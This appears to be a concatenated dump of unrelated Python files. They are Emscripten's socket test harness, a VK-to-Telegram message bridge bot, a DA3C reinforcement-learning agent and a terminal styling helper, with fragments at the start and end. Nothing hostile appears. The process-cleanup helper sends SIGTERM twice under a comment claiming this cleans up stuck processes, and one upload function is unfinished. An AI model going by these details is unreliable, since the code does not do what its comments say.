md = mdUtils.add_json(md, json.loads(mdUtils.get_catalog_metadata_activity(main_start_date,
mdUtils.xsd_dateTime(),
catcodename,
arti_params_dict)))
# osUtils.write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
# json.dumps(md))
osUtils._write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
json.dumps(md))
xattr.setxattr(catalog_path, 'onedata_json', json.dumps(md))
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(config.NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
      # try to terminate again; if the process did not exit after the first
      # SIGTERM, this second attempt should clean it up.
      try:
        p.terminate() # SIGTERM (second attempt)
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
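# Both harnesses are used as context managers by the tests below, e.g. (illustrative
# port number; __enter__ builds and starts the echo server, __exit__ tears it down):
#
#   with CompiledServerHarness('sockets/test_sockets_echo_server.c', [], 49999):
#     ... # run the client btest against port 49999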
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + test_file('sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
sockets_include = '-I' + test_file('sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = test_file('sockets', 'test_sockets_echo_client.c')
input = read_file(input_filename)
create_file('test_sockets_echo_bigdata.c', input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest('test_sockets_echo_bigdata.c', expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(os.path.join('sockets', 'test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + test_file('sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + test_file('sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(test_file('websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(test_file('websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
funcs.py
|
import telebot, requests, threading, asyncio, json, io, aiohttp, traceback, lang
from vk.exceptions import *
from vk import Session, API
from PIL import Image
from settings import SETTINGS
from sql import SQL
# Database initialisation
db = SQL(SETTINGS().DB_NAME)
tg = telebot.TeleBot(SETTINGS().TOKEN)
loop = asyncio.get_event_loop()
async def upload_photo(encoded_image, upload_url):
data = aiohttp.FormData()
data.add_field('photo',
encoded_image,
filename='picture.png',
content_type='multipart/form-data')
async with aiohttp.ClientSession() as sess:
async with sess.post(upload_url, data=data) as resp:
result = json.loads(await resp.text())
data = dict(photo=result['photo'], hash=result['hash'], server=result['server'])
return data
def InitUsers(data):
for i in data:
threading.Thread(target=AddUserToListen, args=(i[0], i[1])).start()
    print('Users loaded successfully!')
def AddUserToListen(tl_id, access_key):
session = Session(access_token=access_key)
vk = API(session)
    # Fetch the long-poll server once so key/server/ts come from the same response
    longpoll = vk.messages.getLongPollServer(v='5.74')
    key = longpoll['key']
    server = longpoll['server']
    ts = longpoll['ts']
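    # VK Long Poll loop: keep asking the long-poll server for updates newer than `ts`.
    # Event code 4 means "new message"; the flag comparisons below presumably skip
    # outgoing/service messages (assumption based on typical VK long-poll flag values).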
while True:
r = requests.get('https://'+str(server)+'?act=a_check&key='+str(key)+'&ts='+str(ts)+'&wait=60&mode=2&version=2&v=5.74')
ts = r.json()['ts']
upd = r.json()['updates']
for i in range(len(upd)):
if upd[i][0]==4 and upd[i][2]!=51 and upd[i][2]!=19 and upd[i][2]!=35 and upd[i][2]!=547 and upd[i][2]!=563 and upd[i][2]!=3:
user = vk.users.get(user_ids=upd[i][3],fields='sex',v='5.74')[0]
msg_text = str(upd[i][5])
if upd[i][3] != db.get_data(tl_id)[4]:
tg.send_message(chat_id=tl_id, disable_web_page_preview=True, parse_mode='HTML', text=lang.ru.UserReceiveHeader(user))
tg.send_message(chat_id=tl_id, disable_web_page_preview=True, parse_mode='HTML', text=msg_text)
msg = vk.messages.getById(message_ids=upd[i][1],v='5.74')['items'][0]
if msg.get('attachments') != None:
for a in msg['attachments']:
if a['type']=='photo':
img = a['photo']['photo_604']
tg.send_photo(chat_id=tl_id, photo=img)
elif a['type']=='audio':
tg.send_audio(chat_id=tl_id, audio=a['audio']['url'])
elif a['type']=='doc':
tg.send_document(chat_id=tl_id, data=a['doc']['url'])
db.set_sender(tl_id, upd[i][3])
def SendMsg(tl_id, access_key, reciever_id, msg):
session = Session(access_token=access_key)
vk = API(session)
try:
vk.messages.send(user_id=int(reciever_id), message=msg,v='5.74')
except:
try:
vk.messages.send(domain=reciever_id, message=msg,v='5.74')
except Exception as e:
            tg.send_message(chat_id=tl_id, text='Return to the menu and check that the entered ID is correct.')
def SendImg(tl_id, access_key, reciever_id, img):
img = Image.open(io.BytesIO(img))
buffer = io.BytesIO()
img.save(buffer, format='png')
buffer.seek(0)
session = Session(access_token=access_key)
vk = API(session)
r = loop.run_until_complete(upload_photo(buffer, vk.photos.getMessagesUploadServer(v='5.74')['upload_url']))
final_image = vk.photos.saveMessagesPhoto(photo=r['photo'], server=r['server'], hash=r['hash'],v='5.74')
try:
vk.messages.send(user_id=int(reciever_id), message=' ', attachment='photo'+str(final_image[0]['owner_id'])+'_'+str(final_image[0]['id']),v='5.74')
except:
try:
vk.messages.send(domain=reciever_id, message='', attachment='photo'+str(final_image[0]['owner_id'])+'_'+str(final_image[0]['id']),v='5.74')
except:
            tg.send_message(chat_id=tl_id, text='Return to the menu and check that the entered ID is correct.')
def SendDoc(access_key, reciever_id, doc):
session = Session(access_token=access_key)
vk = API(session)
url = vk.docs.getUploadServer()['upload_url']
r = requests.post(url, files={'file': doc})
print(r.json())
print(url)
|
agent.py
|
from __future__ import absolute_import
from builtins import object
import logging
import numpy as np
import threading
import six.moves.queue as queue
from relaax.common import profiling
from relaax.server.common import session
from relaax.common.algorithms.lib import utils
from relaax.common.algorithms.lib import observation
from .lib.da3c_replay_buffer import DA3CReplayBuffer
from . import da3c_config
from . import da3c_model
logger = logging.getLogger(__name__)
profiler = profiling.get_profiler(__name__)
M = False
# DA3CAgent implements training regime for DA3C algorithm
# If exploit on init set to True, agent will run in exploitation regime:
# stop updating shared parameters and at the end of every episode load
# new policy parameters from PS
class Agent(object):
def __init__(self, parameter_server, metrics):
self.ps = parameter_server
self.metrics = metrics
self.exploit = False
self.session = None
self.lstm_zero_state = None
self.lstm_state = self.initial_lstm_state = None
self.observation = None
self.last_action = None
self.last_value = None
self.last_probs = None
self.queue = None
self.icm_observation = None
self.replay_buffer = None
self.terminal = False
self.discounted_reward = None
self.filter = None
self.agent_weights_id = 0
# environment is ready and
# waiting for agent to initialize
def init(self, exploit=False):
self.exploit = exploit
model = da3c_model.AgentModel()
self.session = session.Session(model)
if da3c_config.config.use_lstm:
self.lstm_state = self.initial_lstm_state = self.lstm_zero_state = model.lstm_zero_state
if da3c_config.config.lstm_type.lower() == 'dilated':
self.session.op_lstm_reset_timestep()
self.observation = observation.Observation(da3c_config.config.input.history)
self.last_action = None
self.last_value = None
self.last_probs = None
if da3c_config.config.hogwild and not da3c_config.config.use_icm:
self.queue = queue.Queue(10)
threading.Thread(target=self.execute_tasks).start()
self.receive_experience()
else:
self.queue = None
if da3c_config.config.use_icm:
self.icm_observation = observation.Observation(da3c_config.config.input.history)
if da3c_config.config.use_filter:
self.filter = utils.ZFilter(da3c_config.config.input.shape)
self.replay_buffer = DA3CReplayBuffer(self)
return True
# Callback methods
def begin(self):
self.do_task(self.receive_experience)
if da3c_config.config.use_lstm:
self.initial_lstm_state = self.lstm_state
self.get_action_and_value()
def end(self, experience):
if not self.exploit:
self.do_task(lambda: self.send_experience(experience))
@profiler.wrap
def reset(self):
if da3c_config.config.use_lstm:
self.initial_lstm_state = self.lstm_state = self.lstm_zero_state
if da3c_config.config.lstm_type.lower() == 'dilated':
self.session.op_lstm_reset_timestep()
# End callback methods
@profiler.wrap
def step(self, reward, state, terminal):
if da3c_config.config.use_filter and not terminal:
state = self.filter(state)
if reward is not None:
if da3c_config.config.use_icm and not terminal:
int_reward = self.get_intrinsic_reward(state)
self.metrics.scalar('intrinsic_reward', int_reward)
reward += int_reward
reward = np.tanh(reward)
self.push_experience(reward, terminal)
else:
if da3c_config.config.use_icm:
self.icm_observation.add_state(None)
self.icm_observation.add_state(state)
if terminal:
self.observation.add_state(None)
else:
assert state is not None
self.metrics.histogram('state', state)
self.observation.add_state(state)
self.terminal = terminal
assert self.last_action is None
assert self.last_value is None
assert self.last_probs is None
self.get_action_and_value()
@property
def experience(self):
return self.replay_buffer.experience
# environment generated new state and reward
# and asking agent for an action for this state
@profiler.wrap
def update(self, reward, state, terminal):
self.check_state_shape(state)
# replace empty state with constant one
if list(np.asarray(state).shape) == [0]:
state = [0]
self.step(reward, state, terminal)
return self.last_action
@staticmethod
def check_state_shape(state):
if state is None:
return
expected_shape = list(da3c_config.options.algorithm.input.shape)
actual_shape = list(np.asarray(state).shape)
if actual_shape != expected_shape:
logger.warning('State shape %s does not match to expected one %s.', repr(actual_shape),
repr(expected_shape))
#########################
# From batch
def execute_tasks(self):
while True:
task = self.queue.get()
task()
def do_task(self, f):
if self.queue is None:
f()
else:
self.queue.put(f)
@profiler.wrap
def send_experience(self, experience):
self.apply_gradients(self.compute_gradients(experience), experience['reward'])
if da3c_config.config.use_icm:
self.ps.session.op_icm_apply_gradients(gradients=self.compute_icm_gradients(experience))
@profiler.wrap
def receive_experience(self):
self.ps.session.op_check_weights()
weights, self.agent_weights_id = self.ps.session.op_get_weights()
# print('w_id', self.agent_weights_id)
if M:
for i, w in enumerate(utils.Utils.flatten(weights)):
self.metrics.histogram('weight_%d' % i, w)
self.session.op_assign_weights(weights=weights)
if da3c_config.config.use_icm:
self.session.op_icm_assign_weights(weights=self.ps.session.op_icm_get_weights())
def push_experience(self, reward, terminal):
assert self.observation.queue is not None
assert self.last_action is not None
assert self.last_value is not None
assert self.last_probs is not None
self.replay_buffer.step(
terminal,
reward=reward,
state=self.observation.queue,
action=self.last_action,
value=self.last_value,
probs=self.last_probs
)
self.last_action = None
self.last_value = None
self.last_probs = None
def get_action_and_value(self):
if self.observation.queue is None:
self.last_action = None
self.last_value = None
self.last_probs = None
else:
self.last_action, self.last_value = self.get_action_and_value_from_network()
assert self.last_action is not None
assert self.last_value is not None
assert self.last_probs is not None
def get_action_and_value_from_network(self):
if da3c_config.config.use_lstm:
action, value, lstm_state = \
self.session.op_get_action_value_and_lstm_state(state=[self.observation.queue],
lstm_state=self.lstm_state,
lstm_step=[1])
condition = self.experience is not None and (len(self.experience) ==
da3c_config.config.batch_size or self.terminal)
if not condition:
self.lstm_state = lstm_state
else:
action, value = self.session.op_get_action_and_value(state=[self.observation.queue])
value, = value
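        # One returned tensor means a discrete policy (softmax action probabilities);
        # two tensors mean a continuous Gaussian policy parameterised by (mu, sigma^2).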
if len(action) == 1:
if M:
self.metrics.histogram('action', action)
self.last_probs, = action
return utils.choose_action_descrete(self.last_probs), value
mu, sigma2 = action
self.last_probs = mu
if M:
self.metrics.histogram('mu', mu)
self.metrics.histogram('sigma2', sigma2)
return utils.choose_action_continuous(mu, sigma2, da3c_config.config.output.action_low,
da3c_config.config.output.action_high), value
def get_intrinsic_reward(self, state):
self.icm_observation.add_state(state)
if state is not None:
icm_input = [self.observation.queue, self.icm_observation.queue]
return self.session.op_get_intrinsic_reward(state=icm_input, probs=[self.last_probs])[0]
return 0
def compute_gradients(self, experience):
r = 0.0
if self.last_value is not None:
r = self.last_value
reward = experience['reward']
gamma = da3c_config.config.rewards_gamma
# compute discounted rewards
self.discounted_reward = utils.discount(np.asarray(reward + [r], dtype=np.float32), gamma)[:-1]
# compute advantage wrt rewards and critic values
forward_values = np.asarray(experience['value'][1:] + [r]) * gamma
rewards = np.asarray(reward) + forward_values - np.asarray(experience['value'])
advantage = utils.discount(rewards, gamma * da3c_config.config.gae_lambda,
normalize=da3c_config.config.norm_adv)
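        # This is Generalized Advantage Estimation: delta_t = r_t + gamma * V(s_{t+1}) - V(s_t),
        # and the advantage is the (gamma * lambda)-discounted sum of those deltas,
        # optionally normalized.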
feeds = dict(state=experience['state'], action=experience['action'],
advantage=advantage, discounted_reward=self.discounted_reward)
if da3c_config.config.use_lstm:
feeds.update(dict(lstm_state=self.initial_lstm_state, lstm_step=[len(reward)]))
gradients, summaries = self.session.op_compute_gradients_and_summaries(**feeds)
self.metrics.summary(summaries)
return gradients
def compute_icm_gradients(self, experience):
states, icm_states = experience['state'], []
for i in range(len(states) - 1):
icm_states.extend((states[i], states[i + 1]))
icm_states.extend((states[-1], self.icm_observation.queue))
return self.session.op_compute_icm_gradients(state=icm_states,
action=experience['action'],
probs=experience['probs'])
def apply_gradients(self, gradients, rewards):
experience_size = len(rewards)
if M:
for i, g in enumerate(utils.Utils.flatten(gradients)):
self.metrics.histogram('gradients_%d' % i, g)
# self.ps.session.op_apply_gradients(gradients=gradients, increment=experience_size)
self.ps.session.op_submit_gradients(gradients=gradients, step_inc=experience_size,
agent_step=self.agent_weights_id)
self.ps.session.op_check_weights()
self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=sum(rewards),
reward_weight=experience_size)
|
quack.py
|
#!/usr/bin/python3
import os
import sys
import time
import json
from pprint import pprint
from threading import Thread
from colorama import Fore, Back, Style
RESET_CHARS = Fore.RESET + Back.RESET + Style.RESET_ALL
PATH = os.path.dirname(os.path.realpath(__file__))
SPINNER_JSON = os.path.join(PATH, "data", "spinners.json")
SPINNERS = json.load(open(SPINNER_JSON))
STYLES_JSON = os.path.join(PATH, "data", "styles.json")
STYLES = json.load(open(STYLES_JSON))
STYLE_FIELDS = {
"background": "Back",
"foreground": "Fore",
"style": "Style"
}
def spin(spinner: str, fn, *args):
timer = 0
idx = 0
frames = SPINNERS[spinner]["frames"]
interval = SPINNERS[spinner]["interval"]
action = Thread(target=fn, args=args)
action.start()
while action.is_alive():
timer += (interval / 1000)
sys.stdout.write(
f"[{str(timer).split('.')[0]}s][ {frames[idx]} ]\r"
)
sys.stdout.flush()
time.sleep(interval / 1000)
if idx == len(frames) - 1:
idx = 0
else:
idx += 1
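# Example usage (assumes a spinner named "dots" exists in data/spinners.json):
#
#   spin("dots", time.sleep, 3)  # animate the spinner while time.sleep(3) runs in a thread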
def ask(prompt: str, style: str):
chars = __get_style_chars(style)
if chars:
        answer = input(''.join(chars) + prompt + RESET_CHARS)
        return answer
def talk(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
print(''.join(chars) + msg + RESET_CHARS)
def eloquate(data: dict, style: str):
chars = __get_style_chars(style)
if chars:
sys.stdout.write(''.join(chars))
pprint(data, indent=2)
sys.stdout.write(RESET_CHARS)
sys.stdout.flush()
def title(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
        print(''.join(chars) + __wrap(msg, "=") + RESET_CHARS)
def subtitle(msg: str, style: str):
chars = __get_style_chars(style)
if chars:
        print(''.join(chars) + __wrap(msg, "-") + RESET_CHARS)
def list_styles():
for s in STYLES.keys():
print(s)
def __get_style_chars(style: str):
s = __get_style(style)
chars = []
if s:
for key in s.keys():
if key in STYLE_FIELDS:
chars.append(__get_char(STYLE_FIELDS[key], s[key]))
return chars
def __get_style(style):
s = STYLES.get(style, None)
if s:
return s
else:
raise Exception("Style did not exist in styles.json.")
def __get_char(category: str, choice: str):
try:
char = getattr(globals()[category], choice)
return char
except AttributeError as e:
print("Color or Style unavailable in colorama.")
raise e
def __wrap(msg: str, s: str):
d = s * len(msg)
return f"{d}\n{msg}\n{d}"
|
run.py
|
from __future__ import print_function
import os, sys, signal
# adding import path for the directory above this script (for deeplab modules)
myPath = os.path.dirname(sys.argv[0])
rootPath = os.path.join(myPath,'..')
uploadPath = os.path.join(rootPath, "upload")
resultsPath = os.path.join(rootPath, "results")
weightsModelPath = os.path.join(rootPath, "deeplab_resnet.ckpt")
sys.path.append(rootPath)
import tornado.httpserver, tornado.ioloop, tornado.options, tornado.web, os.path, random, string
